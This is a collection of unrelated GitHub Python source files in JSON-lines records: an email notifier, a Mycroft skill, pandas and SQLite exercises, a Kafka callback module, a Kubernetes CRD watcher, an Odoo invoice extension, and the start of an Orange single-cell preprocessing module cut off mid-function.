mailcontents\n print('mail Subject is :' + str(mailcontents))\n #contents information\n # msg.attach(txt)\n # txt = MIMEText(Configruation.LOGINURL+'?title='+Configruation.LOGINJUMPTOPAGE, 'plain', 'utf-8')\n # msg.attach(txt)\n #attach file\n # attach = MIMEApplication(open(\"D:\\xx\\\\tool\\pycharm\\\\1.csv\").read())\n # attach.add_header('Content-Disposition', 'attachment', filename='1.csv')\n # msg.attach(attach)\n tableHeadTemplate = ' {0}'\n tableContentsTemplate = '{0}'\n tableContentsLinkTemplate = ' {1} '\n emailCommentsTemplate = '

{0}

{1}

'\n # emailCommentsContentsTemplate = '

{0}

'\n tableContents = ''\n tableHeads = ''\n emailComments = ''\n wikiLink = tableContentsLinkTemplate.format(Configruation.LOGINURL+'?title='+Configruation.LOGINJUMPTOPAGE,'The Delivery Note Wiki Link')\n for head in Configruation.DELIVERY_TABLE_HEAD:\n tableHeads = tableHeads + tableHeadTemplate.format(head)\n tableContents = ''\n contentList = XmlReader.getAnSpecialCategoryValue(xmlFileName, 'DliveryInfo',['Value'])\n for contentitem in contentList:\n contentitem = str(contentitem[0]).replace('\\n','
')\n if '[' in contentitem:\n contentitemlinklist = []\n breaklinefalg = False\n if '
' in contentitem:\n contentitemlinklist = contentitem.split('
')\n breaklinefalg = True\n else:\n contentitemlinklist.append(contentitem)\n contentitemlinkcounter = 0\n contentitem = ''\n for contentitemlink in contentitemlinklist:\n if '[' in contentitemlink:\n contentlist = contentitemlink.replace('[','').replace(']','').split(' ')\n tablecellcontents = ''.join(contentlist[1:])\n contentitem += tableContentsLinkTemplate.format(contentlist[0],tablecellcontents)\n if breaklinefalg and contentitemlinkcounter < len(contentitemlinklist)-1:\n contentitem += '
'\n contentitemlinkcounter += 1\n tableContents = tableContents + tableContentsTemplate.format(contentitem)\n emailCommentsTitleList = XmlReader.getAnSpecialCategoryValue(xmlFileName, 'Delivery_Email_Content',['Title'])\n emailCommentsContentList = XmlReader.getAnSpecialCategoryValue(xmlFileName, 'Delivery_Email_Content', ['Contents'])\n for i in range(len(emailCommentsTitleList)):\n emailComments = emailComments + emailCommentsTemplate.format(str(emailCommentsTitleList[i][0]).replace('\\n', '
') ,\n str(emailCommentsContentList[i][0]).replace('\\n','
  '))\n # commentsContentsSpilt = str(emailCommentsContentList[i]).replace('\\n','
')\n # commentsContents = ''\n # for row in emailCommentsContentList[i].split('\\n'):\n # commentsContents = commentsContents + emailCommentsContentsTemplate.format(row)\n # emailComments = emailComments+ commentsContents\n body = \"\"\"\n \n \n \n \n Delivery Contents\n \n \n \n {1}\n \n \n {2}\n \n \n {3}\n \n
\n {4}\n


This page auto generate by delivery record program
\n \n \n \n \"\"\".format('{line-height: 5px;}',wikiLink,tableHeads,tableContents,emailComments)\n text = MIMEText(body, 'html', 'utf-8')\n # f = open('D:\\xx\\pip.png', 'rb')\n # pic = MIMEImage(f.read())\n # f.close()\n # pic.add_header('Content-ID', '')\n msg.attach(text)\n server = smtplib.SMTP(mailserver, 587)\n # server.set_debuglevel(1)\n server.ehlo()\n server.starttls()\n try:\n server.login(sender, passwd)\n except Exception as e:\n try:\n server.login(account, passwd)\n except Exception as e:\n print('mail login failed' + str(e.with_traceback()))\n pass\n print('mail server login success')\n server.sendmail(sender, receivers, msg.as_string())\n print('mail send...')\n print('mail send success')\n server.quit()\n print('mail server quit')\nexcept Exception as e:\n print('mail script run error' + str(e.with_traceback()))","repo_name":"pengjianaixue/Delivery-Record","sub_path":"Delivery_Record_WIKI_Proxy_Server/Delivery_Record_Notify_EmailSend.py","file_name":"Delivery_Record_Notify_EmailSend.py","file_ext":"py","file_size_in_byte":5831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10436710416","text":"import os\n\nfrom adapt.intent import IntentBuilder\nfrom mycroft.skills.core import MycroftSkill, intent_handler\nfrom mycroft.util.log import LOG\nfrom mycroft.audio import wait_while_speaking \n\n__author__ = 'Chirag'\n\nclass WhatCanYouDoSkill(MycroftSkill):\n\n def __init__(self):\n super(WhatCanYouDoSkill, self).__init__(name=\"WhatCanYouDoSkill\")\n \n @intent_handler(IntentBuilder(\"\").require(\"What\").require(\"Can\").require(\"Do\"))\n def handle_what_can_do__intent(self, message):\n # tell user what he can do\n self.speak_dialog(\"what.i.can\") \n \n # execute function getSkills -> get list of installed skills\n self.getSkills() \n\n def getSkills(self):\n # get list of skills via msm and search for \"installed\"\n self.myskills = os.popen('msm list | grep installed').read() \n self.myskills = self.myskills.replace('\\n', ', ').replace('\\r', ', ').replace('[installed],', ',').replace('\\t', '') # replace unwanted characters and make nice list\n # get number of skills\n nr_skills = len(self.myskills.split()) \n\n if nr_skills < 1: # if msm did not give us what we want (no matter why) do alternative skill search\n self.myskills = os.popen('ls /opt/mycroft/skills/').read() # Get folders in /opt/mycroft/skills\n self.myskills = self.myskills.replace('\\n', ', ').replace('\\r', ', ').replace('\\t', '') # replace unwanted characters and make nice list\n nr_skills = len(self.myskills.split()) # get number of skills\n \n if nr_skills < 1: # if msm and alternative skill search fails than tell user that we couldn't do the job\n wait_while_speaking() # always wait\n self.speak_dialog(\"not.found\") # tell user that we couldn't do the job\n return # if all fails, return\n # always wait\n wait_while_speaking() \n # we found skills -> yeah. 
tell user how many!\n self.speak_dialog('found', {'nrskills': nr_skills}) \n # always wait\n wait_while_speaking() \n # ask user if we should give him a list of all his skills.\n self.should_getskills = self.get_response('ask.getskills') \n # get list of confirmation words\n self.yes_words = set(self.translate_list('yes')) \n # execute function listSkills -> if user confirmed -> give him a list of all his skills, else -> exit\n self.listSkills() \n \n def listSkills(self):\n if self.should_getskills: # if user said something\n resp_getskills = self.should_getskills.split() # split user sentence into list\n if any(word in resp_getskills for word in self.yes_words): # if any of the words from the user sentences is yes\n self.speak_dialog('my.skills') # Introduction that we will give user list of skills\n self.speak(self.myskills.strip()) # tell user list of skills\n else: # no word in sentence from user was yes\n self.speak_dialog('no.skills') # give user feedback\n\n def shutdown(self):\n super(WhatCanYouDoSkill, self).shutdown()\n\n def stop(self):\n pass\n\ndef create_skill():\n return WhatCanYouDoSkill()\n","repo_name":"writetovibhor/what-can-you-do-skill","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"14741267243","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\ndf=pd.read_csv('survey_results_public.csv',index_col='ResponseId')\n\ndf.shape\n\ndf\n\ndf.columns\n\ndf.PlatformHaveWorkedWith.unique()\n\ndf.Employment.unique()\n\ndf['Employment'].value_counts(normalize=True)\n\nslice=[0.643088,0.141390,0.096504,0.035536,0.029536,0.024615]\nlabels=['Employed full-time ','Student, full-time ','Independent contractor, freelancer, or self-employed',\n 'Not employed, but looking for work ','Employed part-time','Student, part-time ']\n\nplt.pie(slice,labels=labels,autopct='%1.1f%%',wedgeprops={'edgecolor':'black'})\n\n\ndf.rename(columns={'ConvertedCompYearly':'Salary'},inplace=True)\n\ndf['Salary'].median()\n\ncountry_group=df.groupby(['Country'])\n\ncountry_group.get_group('Greece')\n\nsal_gre=country_group['Salary'].median().loc['Greece']\n\nsal_germ=country_group['Salary'].median().loc['Germany']\n\nsal_aus=country_group['Salary'].median().loc['Austria']\nsal_gre\nsal_germ\nsal_aus\n\nsal_neth=country_group['Salary'].median().loc['Netherlands']\nsal_neth\n\navg_sal=[25944.0,64859.0,54049.0,59676.0]\nlabels=['Greece','Germany','Austria','Netherlands']\n\nplt.pie(avg_sal,labels=labels)\n\n\n\ncountry_uses_python=country_group['LanguageHaveWorkedWith'].apply(lambda x:x.str.contains('Python').sum())\n\n\ncountry_uses_python.head(10)\n\n\ngre_py=country_uses_python.loc['Greece']\n\n\ncan_py=country_uses_python.loc['Canada']\n\n\nger_py=country_uses_python.loc['Germany']\n\n\naustr_py=country_uses_python.loc['Australia']\n\n\nuse_python=[gre_py,can_py,ger_py,austr_py]\n\nlabels=['Greece','canada','Germany','Australia']\nexplode=[0.1,0,0,0]\n\n\nplt.pie(use_python,labels=labels,explode=explode)\n\n\n\n\n\n\n","repo_name":"SamDimitra/Python-Pandas-Matplotlib","sub_path":"exercise2/Python-Pandas-Matplotlib-2.py","file_name":"Python-Pandas-Matplotlib-2.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7214674118","text":"from src import kafka, schemas, logging, messages\nfrom src 
import repository_automation_item, repository_automation_step, repository_automation_item_history\nfrom threading import Thread\n\n__module_name__ = 'src.callbacks'\n\n\ndef send_to_kafka(current_step, automation_item, message):\n Thread(target=kafka.kafka_producer, args=(current_step.topic, automation_item.uuid, message,)).start()\n\n\ndef verify_if_next_step_exists(msg, automation_item):\n if msg['steps']['next_step'] is not None:\n if 'Exception' in msg['status']:\n current_step, message = next_step_not_exists(msg)\n\n automation_item.status = 'failed'\n msg['try_count'] = msg['try_count'] - 1\n\n description = f'{str(msg[\"status\"])}'\n logging.send_log_kafka('EXCEPTION', __module_name__, 'verify_if_next_step_exists',\n f'Item {msg[\"uuid\"]} marked as Error', msg[\"transaction_id\"])\n\n else:\n current_step, message = next_step_exists(msg, automation_item)\n\n automation_item.status = 'pending'\n description = messages.ITEM_SENT_TO_QUEUE.format(current_step.topic)\n logging.send_log_kafka('INFO', __module_name__, 'verify_if_next_step_exists',\n f'Item {msg[\"uuid\"]} sent to Queue {current_step.topic}', msg[\"transaction_id\"])\n\n send_to_kafka(current_step, automation_item, message)\n\n else:\n automation_item.status = 'finished'\n description = messages.ITEM_FINISHED\n logging.send_log_kafka('INFO', __module_name__, 'verify_if_next_step_exists',\n f'Item {msg[\"uuid\"]} finished.', msg[\"transaction_id\"])\n\n return description\n\n\ndef next_step_exists(msg, automation_item):\n max_step = msg['steps']['max_steps']\n\n current_step = repository_automation_step.get_by_uuid(uuid=msg['steps']['next_step']['uuid'])\n next_step = repository_automation_step.get_step_by_automation_id(\n automation_id=msg['steps']['next_step']['automation_id'],\n step=msg['steps']['next_step']['step'] + 1) \\\n if msg['steps']['next_step']['step'] < max_step else None\n\n next_step = next_step.to_json() if next_step else None\n\n automation_item.automation_step = current_step\n\n schema_automation_step_item = schemas.AutomationItemGetSchema()\n schema_data = schema_automation_step_item.dump(automation_item)\n\n json_steps = {\n \"steps\": {\n \"max_steps\": max_step,\n \"current_step\": current_step.to_json(),\n \"next_step\": next_step\n }\n }\n\n json_try_count = {\n \"try_count\": current_step.try_count\n }\n\n transaction_id = {\n \"transaction_id\": msg[\"transaction_id\"]\n }\n\n schema_data.update(json_steps)\n schema_data.update(json_try_count)\n schema_data.update(transaction_id)\n message = schema_data\n\n return current_step, message\n\n\ndef next_step_not_exists(msg):\n current_step = repository_automation_step.get_by_uuid(uuid=msg['steps']['current_step']['uuid'])\n message = msg\n return current_step, message\n\n\ndef items_processed(app, key, msg):\n with app.app_context():\n automation_item = repository_automation_item.get_by_uuid(uuid=msg['uuid'])\n if automation_item:\n if msg['try_count'] > 1:\n\n description = verify_if_next_step_exists(msg, automation_item)\n\n else:\n if 'Exception' in msg['status']:\n automation_item.status = 'failed'\n description = f'{str(msg[\"status\"])}'\n logging.send_log_kafka('EXCEPTION', __module_name__, 'items_processed',\n f'It was not possible to process the item {msg[\"uuid\"]}',\n msg[\"transaction_id\"])\n\n else:\n description = verify_if_next_step_exists(msg, automation_item)\n logging.send_log_kafka('INFO', __module_name__, 'items_processed',\n f'Item {msg[\"uuid\"]} processed successfully', msg[\"transaction_id\"])\n\n new_item = {\n \"data\": 
msg['data'],\n \"steps\": msg['steps'],\n }\n\n try:\n repository_automation_item_history.create(automation_item=automation_item, description=f'{description}')\n except Exception as e:\n logging.send_log_kafka('CRITICAL', __module_name__, 'items_processed', e.args[0],\n msg[\"transaction_id\"])\n try:\n repository_automation_item.update(automation_item, new_item)\n logging.send_log_kafka('INFO', __module_name__, 'items_processed',\n f'Item {msg[\"uuid\"]} updated successfully', msg[\"transaction_id\"])\n except Exception as e:\n logging.send_log_kafka('CRITICAL', __module_name__, 'items_processed', e.args[0],\n msg[\"transaction_id\"])\n\n\ndef items_in_process(app, key, msg):\n with app.app_context():\n automation_item = repository_automation_item.get_by_uuid(uuid=msg['uuid'])\n if automation_item:\n automation_item.status = 'running'\n try:\n repository_automation_item.update_status(automation_item)\n logging.send_log_kafka('INFO', __module_name__, 'items_in_progress',\n f'Item {msg[\"uuid\"]} is running', msg[\"transaction_id\"])\n except Exception as e:\n logging.send_log_kafka('CRITICAL', __module_name__, 'items_in_progress', e.args[0],\n msg[\"transaction_id\"])\n\n","repo_name":"danbsilva/queue-orchestrator","sub_path":"automation-service/src/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"33893410864","text":"from tkinter import *\nfrom PIL import ImageTk, Image\nfrom geo2d import *\n\n\nclass Window(Tk):\n def __init__(self):\n super().__init__()\n self.image = Image.open(\"photo.jpg\")\n self.photo = ImageTk.PhotoImage(self.image)\n print(self.image.size[0])\n self.canvas = Canvas(self, width=self.image.size[0], height=self.image.size[1])\n self.canvas.create_image(0, 0, anchor=NW, image=self.photo)\n self.segment = Segment(Point(100, 200), Point(800, 300))\n self.x = self.segment.p1.x\n self.y = self.segment.p1.y\n self.ch = self.canvas.create_line(self.segment.p1.x - 5, self.segment.p1.y, self.segment.p1.x + 5,\n self.segment.p1.y)\n self.cv = self.canvas.create_line(self.segment.p1.x, self.segment.p1.y - 5, self.segment.p1.x,\n self.segment.p1.y + 5)\n self.canvas.pack()\n self.ligne = self.canvas.create_line(self.seg_to_tuple(self.segment))\n self.geometry(f\"{self.image.size[0]}x{self.image.size[1]}\")\n self.key_down = False\n self.bind('', self.down, add='+')\n self.bind('', self.up)\n self.increment = 1\n\n def down(self, event):\n if not self.key_down:\n print(event.keysym ,self.increment)\n if event.keysym == \"Right\" and self.x < self.segment.get_xmax():\n self.x += self.increment\n self.x = min(self.x,self.segment.get_xmax())\n elif event.keysym == \"Left\" and self.x > self.segment.get_xmin():\n self.x -= self.increment\n self.x = max(self.x, self.segment.get_xmin())\n elif event.keysym == \"Shift_L\":\n self.increment = 30\n self.y = self.segment.get_y(self.x)\n self.croix()\n\n def up(self, event):\n self.key_down = False\n if event.keysym == \"Shift_L\":\n self.increment = 1\n\n\n def seg_to_tuple(self, seg: Segment):\n return (seg.p1.x, seg.p1.y, seg.p2.x, seg.p2.y)\n\n def croix(self):\n self.canvas.coords(self.ch, self.x - 5, self.y, self.x + 5, self.y)\n self.canvas.coords(self.cv, self.x, self.y - 5, self.x, self.y + 
5)\n","repo_name":"oultetman/profil","sub_path":"profil.py","file_name":"profil.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"3414597228","text":"import asyncio\nimport logging\n\nfrom kubernetes_asyncio import watch\n\nfrom deployer.commands import redeploy\n\nlog = logging.getLogger(__name__)\n\ntype_mapping = {\n \"ADDED\": redeploy,\n \"MODIFIED\": redeploy,\n}\n\n\ndef _emit_event(event):\n module = type_mapping.get(event[\"type\"])\n if module:\n asyncio.ensure_future(module.handle_event(event))\n\n\nasync def monitor(crds, namespace):\n log.info(f\"Monitoring charts.k8s.openttd.org in namespace '{namespace}' for changes ...\")\n\n # Prepare what function we want to call with which parameters\n func = crds.list_namespaced_custom_object\n args = [\"k8s.openttd.org\", \"v1\", namespace, \"charts\"]\n\n # Start by listing all entries, and emit an 'ADDED' for each existing\n # entry. This allows us to get in a known-good-state, and monitor all\n # changes after.\n initial_list = await func(*args)\n for item in initial_list['items']:\n _emit_event({\"type\": \"ADDED\", \"object\": item})\n\n # The list has the resource_version we should use as starting point of\n # our watch().\n resource_version = initial_list['metadata']['resourceVersion']\n\n my_watch = watch.Watch()\n # XXX - kubernetes-asyncio has not sync'd with upstream yet.\n # See https://github.com/kubernetes-client/python-base/commit/2d69e89dab7134186cbcdaf82381ab6295c6c394\n # and https://github.com/tomplus/kubernetes_asyncio/issues/77\n # If this gets fixed, the next line can be removed.\n my_watch.resource_version = resource_version\n\n async with my_watch.stream(func, *args, resource_version=resource_version, _request_timeout=30) as stream:\n async for event in stream:\n _emit_event(event)\n\n log.error(f\"Monitoring in namespace '{namespace}' stopped unexpectedly\")\n\n\nasync def monitor_forever(crds, namespace):\n while True:\n await monitor(crds, namespace)\n","repo_name":"TrueBrain/OpenTTD-IaC","sub_path":"deployer/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31596828743","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models\n\n\nclass AccountInvoiceAbvo(models.Model):\n _inherit = 'account.invoice'\n\n boat_id = fields.Many2one('res.partner', 'Boat',\n help=\"Use this field when the product is related to a Boat Membership\")\n\n @api.multi\n def write(self, vals):\n '''Change the partner on related membership_line'''\n res = super(AccountInvoiceAbvo, self).write(vals)\n if 'boat_id' in vals or 'partner_id' in vals:\n self.env['membership.membership_line'].search([\n ('account_invoice_line', 'in', self.mapped('invoice_line_ids').ids)\n ]).write({'partner': vals.get('boat_id', res.boat_id)})\n return res\n\n\nclass AccountInvoiceLineAbvo(models.Model):\n _inherit = 'account.invoice.line'\n\n @api.multi\n def write(self, vals):\n MemberLine = self.env['membership.membership_line']\n res = super(AccountInvoiceLineAbvo, self).write(vals)\n if res.invoice_id.boat_id:\n member_lines = MemberLine.search([('account_invoice_line', '=', res.id)])\n member_lines.write({\n 'partner': res.invoice_id.boat_id.id})\n return res\n\n @api.model\n def create(self, vals):\n MemberLine = self.env['membership.membership_line']\n invoice_line = super(AccountInvoiceLineAbvo, 
self).create(vals)\n if invoice_line.invoice_id.boat_id:\n member_lines = MemberLine.search([('account_invoice_line', '=', invoice_line.id)])\n member_lines.write({\n 'partner': invoice_line.invoice_id.boat_id.id})\n return invoice_line\n","repo_name":"popsolutions/abvo","sub_path":"models/invoice.py","file_name":"invoice.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"39152944589","text":"a, b = 1, 1\n\nfor ex in range(10):\n print (a)\n # list1.append(list1[-1] + list1[-2])\n c = a + b\n a = b\n b = c\n\na = [1, 1, 2, 3, 5,]\na.remove(1)\n\nprint (a)","repo_name":"alfie-machica/testAI","sub_path":"fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"8218824176","text":"import sqlite3\n#create a connection\nconn = sqlite3.connect('produces.db')\n#create a cursor object\nc = conn.cursor()\n#check\nprint( 'All successful')\n\nstationaries_list= [\n (\"123\", \"pencil\", \"1.50\", \"22\"),\n (\"321\", \"pen\", \"7.50\", \"20\"),\n (\"214\", \"Eraser\", \"2.00\", \"10\"),\n (\"143\", \"Notebook\", \"3.00\", \"12\"),\n (\"412\", \"Ruler\", \"1.50\", \"5\"),\n (\"124\", \"Crimp\", \"0.50\", \"2\"),\n (\"121\", \"Tack\", \"1.20\", \"33\"),\n (\"221\", \"Glue\", \"2.50\", \"1\"),\n (\"1234\", \"stamps\", \"8.50\", \"15\"),\n (\"4321\", \"Drive\", \"6.50\", \"27\"),\n (\"3214\", \"Cord\", \"4.50\", \"3\"),\n (\"3412\", \"Folder\", \"5.00\", \"23\"),\n (\"2135\", \"Paper\", \"10.50\", \"156\"),\n (\"1254\", \"Ipad\", \"30.70\", \"12\"),\n (\"0407\", \"Clip\", \"1.10\", \"37\")\n]\n\nc.executemany( \"\"\" INSERT INTO stationaries VALUES (?, ?, ?, ?) 
\"\"\", stationaries_list )\n\nc.execute(\"SELECT * FROM stationaries\")\n#check\nprint(\"successful\")\n\n# Calculate the amount the business owner invested in the procurement of the items.\nquery =\"\"\" \n SELECT item_id, SUM (cost_price)\n FROM stationaries;\n \"\"\"\n\nc.execute(query)\nitems=c.fetchall()\nprint(f\"{'-' * 40}\\nitem_id \\t total_cost\\n{'-' * 40}\")\nfor item in items:\n item_id, total_cost = item\n print(f\"{item_id}\\t{total_cost}\")\n\n\n#the average quantity of items in stock.\nquery1 = \"\"\"\nSELECT item_id, AVG(quant_in_stock)\nFROM stationaries;\n\"\"\"\n\nc.execute(query1)\nitems=c.fetchall()\nprint(f\"{'-' * 40}\\nitem_id\\tquant_in_stock\\n{'-' * 40}\")\nfor item in items:\n item_id, quant_in_stock = item\n print(f\"{item_id}\\t{quant_in_stock}\")\n\n# the item with the least quantity in stock\nquery2= \"\"\" \n SELECT item_id, name, MIN (quant_in_stock)\n FROM stationaries\n \"\"\"\n\nc.execute(query2)\nitems=c.fetchall()\nprint(f\"{'-' * 40}\\nitem id \\tname\\tleast item in stock\\n{'-' * 40}\")\nfor item in items:\n item_id, name, quant_in_stock = item\n print(f\"{item_id}\\t {name} \\t {quant_in_stock}\")\n\n\n#the item with the most quantity in stock\nquery3= \"\"\" \n SELECT item_id, name, MAX (quant_in_stock)\n FROM stationaries\n \"\"\"\n\nc.execute(query3)\nitems=c.fetchall()\nprint(f\"{'-' * 40}\\nitem id \\tname\\tmost item in stock\\n{'-' * 40}\")\nfor item in items:\n item_id, name, quant_in_stock = item\n print(f\"{item_id}\\t {name} \\t {quant_in_stock}\")\n\n#commit\nconn.commit()\n#close\nconn.close()","repo_name":"AdeAfolabii/SGA_1_3","sub_path":"module5/stationary.py","file_name":"stationary.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24000553832","text":"import re\n\ns = input()\nstr_p = input()\n\np = re.compile(str_p)\nr = p.search(s)\n\nif not r:\n print(\"(-1, -1)\")\n\nwhile r:\n print(\"({start}, {end})\".format(start=r.start(), end=r.end()-1))\n r = p.search(s, r.start()+1)","repo_name":"dydwnsekd/hackerrank","sub_path":"python/Re.start()&Re.end().py","file_name":"Re.start()&Re.end().py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"9471403895","text":"\n\n#Programmer: Andrew Engel\n#Date created: 2018/05/14\n#Filename: controller.py\n#Purpose: functions to facilitate communiation to and from the database\n\nimport user\nimport student\nimport faculty\nimport course\nimport db_api\n\ndef createDB():\n db_api.createDB()\n \ndef authenticate(id, pw):\n if id != \"\" or pw != \"\":\n user1 = db_api.authenticate(id, pw)\n return user1 #returns user record from DB\n else:\n return None\n\ndef getStudentData(id):\n if id != \"\":\n data = db_api.getStudentData(id)\n return data\n else:\n return None\n\ndef getFacultyData(id):\n if id != \"\":\n data = db_api.getFacultyData(id)\n return data\n else:\n return None\n\ndef getCourse(id):\n if id == \"\":\n return None\n else:\n return db_api.getCourse(id)\n\ndef getAllCourses():\n courses = db_api.getAllCourses()\n return courses\n\ndef getStudentCourses(studentID):\n if studentID == \"\":\n return None\n else:\n return db_api.getStudentCourses(studentID)\n\ndef numStudentsInCourse(courseid):\n if courseid == \"\":\n return None\n else:\n return db_api.numStudentsInCourse(courseid)\n\ndef enroll(studentid, courseid):\n if studentid == \"\" or courseid == \"\":\n return None\n 
else:\n db_api.enroll(studentid, courseid)\n\ndef getCourseRecords(userID):\n return db_api.getCourseRecords(userID)\n\ndef getStudentID(userID):\n return db_api.getStudentID(userID)\n\ndef gradeStudent(courseID, facultyID, studentID, grade):\n if courseID == \"\" or facultyID == \"\" or studentID == \"\" or grade == \"\":\n return\n else:\n db_api.gradeStudent(courseID, facultyID, studentID, grade)\n calculateGPA(studentID)\n\ndef isEnrolled(studentID, courseID):\n if studentID == \"\" or courseID == \"\":\n return\n else:\n return db_api.isEnrolled(studentID, courseID)\n\ndef calculateGPA(studentID):\n gpa_dict = {93 : 4.0, 90 : 3.7, 87 : 3.3, 80 : 2.7, 77 : 2.3, 73 : 2.0, 70 : 1.7, 76 : 1.3, 65 : 1.0, 0 : 0.0 }\n grades = getStudentGrades(studentID)\n\n #determine gpa for each course and add to courseGPAs list\n courseGPAs = []\n for grade in grades:\n g = grade[0]\n for key in sorted(gpa_dict.keys(), reverse = True):\n if g >= key:\n courseGPAs.append(gpa_dict[key])\n break\n #sum courseGPAs together and divide by number of courseGPAs\n sumGPA = 0.0\n for course_gpa in courseGPAs:\n sumGPA += course_gpa\n #validate non-zero divisor and calculate GPA\n gpa = 0.0\n if sumGPA > 0.0:\n gpa = sumGPA / len(courseGPAs)\n #update GPA in student table\n db_api.updateStudentGPA(studentID, gpa)\n return gpa\n\n\ndef getStudentGrades(studentID):\n return db_api.getStudentGrades(studentID)\n\n#**************TESTING FUNCTIONS***************\n\ndef getAllStudentRecords():\n return db_api.getAllStudentRecords()\n\ndef getAllCourseRecords():\n return db_api.getAllCourseRecords()","repo_name":"androidengel/college-records","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35048171328","text":"''' Heapq이용 자료구조에서 힙 찾아보깅'''\nfrom heapq import *\n\ndef solution(scoville, K):\n heapify(scoville)\n count=0\n while(scoville[0] Table:\n new_data = data.copy()\n\n if self.base == LogarithmicScale.BinaryLog:\n def func(x, *args, **kwargs):\n return np.log2(x + 1, *args, **kwargs)\n elif self.base == LogarithmicScale.CommonLog:\n def func(x, *args, **kwargs):\n return np.log10(x + 1, *args, **kwargs)\n elif self.base == LogarithmicScale.NaturalLog:\n func = np.log1p\n\n if sp.issparse(new_data.X):\n func(new_data.X.data, out=new_data.X.data)\n else:\n func(new_data.X, out=new_data.X)\n\n return new_data\n\n\nclass Binarize(Preprocess):\n Condition = Enum(\"Binarize\", (\"GreaterOrEqual\", \"Greater\"),\n qualname=\"Binarize.Condition\")\n GreaterOrEqual, Greater = Condition\n\n def __init__(self, condition=GreaterOrEqual, threshold=1):\n self.condition = condition\n self.threshold = threshold\n\n def __call__(self, data: Table) -> Table:\n new_data = data.copy()\n with new_data.unlocked_reference(new_data.X):\n if self.condition == Binarize.GreaterOrEqual:\n new_data.X = new_data.X >= self.threshold\n elif self.condition == Binarize.Greater:\n new_data.X = new_data.X > self.threshold\n return new_data\n\n\nclass Normalize(Preprocess):\n Method = Enum(\"Normalize\", (\"CPM\", \"Median\", \"CP10K\"), qualname=\"Normalize.Method\")\n CPM, Median, CP10K = Method\n\n def __init__(self, method=CPM):\n self.method = method\n\n def __call__(self, *args):\n raise NotImplementedError\n\n def normalize(self, *args):\n raise NotImplementedError\n\n\nclass NormalizeSamples(Normalize):\n def __call__(self, data: Table) -> Table:\n new_data = data.copy()\n with 
new_data.unlocked_reference(new_data.X):\n new_data.X = self.normalize(data.X)\n return new_data\n\n def normalize(self, table: AnyArray) -> AnyArray:\n row_sums = ut.nansum(table, axis=1)\n row_sums[row_sums == 0] = 1 # avoid division by zero errors\n\n if self.method == NormalizeSamples.Median:\n factor = np.nanmedian(row_sums)\n \n elif self.method == NormalizeSamples.CP10K:\n factor = 1e4\n else:\n factor = 1e6\n\n if sp.issparse(table):\n table = sp.diags(1 / row_sums) @ table\n else:\n table = table / row_sums[:, None]\n\n table *= factor\n\n return table\n\n\nclass NormalizeGroups(Normalize):\n def __init__(self, group_var, method=Normalize.CPM):\n super().__init__(method)\n self.group_var = group_var\n\n def __call__(self, data: Table) -> Table:\n group_col = data.get_column(self.group_var)\n group_col = group_col.astype(\"int64\")\n new_data = data.copy()\n with new_data.unlocked_reference(new_data.X):\n new_data.X = self.normalize(data.X, group_col)\n return new_data\n\n def normalize(self, table: AnyArray, group_col: np.ndarray) -> AnyArray:\n group_sums = np.bincount(group_col, ut.nansum(table, axis=1))\n group_sums[group_sums == 0] = 1\n group_sums_row = np.zeros_like(group_col)\n medians = []\n row_sums = ut.nansum(table, axis=1)\n for value, group_sum in zip(np.unique(group_col), group_sums):\n mask = group_col == value\n group_sums_row[mask] = group_sum\n if self.method == NormalizeGroups.Median:\n medians.append(np.nanmedian(row_sums[mask]))\n\n if self.method == NormalizeGroups.Median:\n factor = np.min(medians)\n else:\n factor = 1e6\n\n if sp.issparse(table):\n table = sp.diags(1 / group_sums_row) @ table\n else:\n table = table / group_sums_row[:, None]\n\n table *= factor\n\n return table\n\n\nclass Standardize(Preprocess):\n def __init__(self, lower_bound=None, upper_bound=None):\n self.lower_bound = lower_bound\n self.upper_bound = upper_bound\n\n def __call__(self, data):\n new_data = data.copy()\n with np.errstate(invalid=\"ignore\"):\n with new_data.unlocked_reference(new_data.X):\n new_data.X = np.nan_to_num(zscore(data.X))\n if self.lower_bound is not None or self.upper_bound is not None:\n with new_data.unlocked(new_data.X):\n np.clip(new_data.X, self.lower_bound, self.upper_bound, new_data.X)\n return new_data\n\n\nclass SelectMostVariableGenes(Preprocess):\n Method = Enum(\"SelectMostVariableGenes\",\n (\"Dispersion\", \"Variance\", \"Mean\"),\n qualname=\"SelectMostVariableGenes.Method\")\n Dispersion, Variance, Mean = Method\n\n def __init__(self, method=Dispersion, n_genes=1000, n_groups=20):\n self.method = method\n self.n_genes = n_genes\n self.n_groups = n_groups if n_groups and n_groups > 1 else 1\n\n def __call__(self, data: Table) -> Table:\n n_groups = min(self.n_groups, len(data.domain.attributes))\n mean = ut.nanmean(data.X, axis=0)\n variance = ut.nanvar(data.X, axis=0)\n 